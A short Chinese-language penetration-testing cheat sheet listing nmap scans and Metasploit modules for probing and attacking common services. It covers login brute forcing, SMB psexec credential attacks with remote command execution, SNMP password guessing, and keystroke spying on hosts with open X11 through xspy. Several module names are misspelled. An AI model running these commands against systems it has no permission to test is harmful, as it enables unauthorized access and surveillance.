服務掃描及攻擊
1.Web服務:
nmap -sS -PS80 -p 80 –oG web.txt
use auxiliary/sanner/http/webdav_scanner(Webdav服務器)
2.SSH服務:
Nmap
use auxiliary/sanner/ssh/ssh_version
猜解:use auxiliary/sanner/ssh/ssh_login
3.Telnet服務
use auxiliary/sanner/telnet/telnet_version
4.FTP服務
use auxiliary/sanner/ftp/ftp_version
use auxiliary/sanner/ftp/anonymous //探測是否允許匿名登錄
5.SMB服務:
猜解:use auxiliary/smb/smb_login(易被記錄)
use exploit/windows/smb psexec #憑證攻擊登錄域控制器
use auxiliary/admin/smb/psexec_command #命令執行
6.Oracle服務:
nmap -sS -p 1521 IP
use auxiliary/sanner/oracle/tnslsnr_version
7.Mssql服務:
nmap -sS -p T:1433,U:1434 IP nmap –sU 192.168.33.130 -p1434
use auxiliary/sanner/mssql/mssql_ping
8.Mysql服務:
use auxiliary/sanner/mysq/mysql_version發現mysql服務
use auxiliary/scanner/mysql/mysql
9.VNC服務
use auxiliary/sanner/vnc/vnc_none_auth //探測VNC空口令
10.SNMP服務:
use auxiliary/sanner/snmp/snmp_enum
猜解:use auxiliary/sanner/snmp_login
admsnmp IP –wordfile snmp.password [-outputfile <name>]
利用字符串獲取系統信息:./snmpenum.pl IP 字符串 cisco.txt(linux.txt)
11.OpenX11空口令:
use auxiliary/scanner/x11/open_x11
當掃描到此漏洞的主機後可以使用 xspy工具來監視對方的鍵盤輸入: cd/pentest/sniffers/xspy/
xspy –display 192.168.1.100:0 –delay 100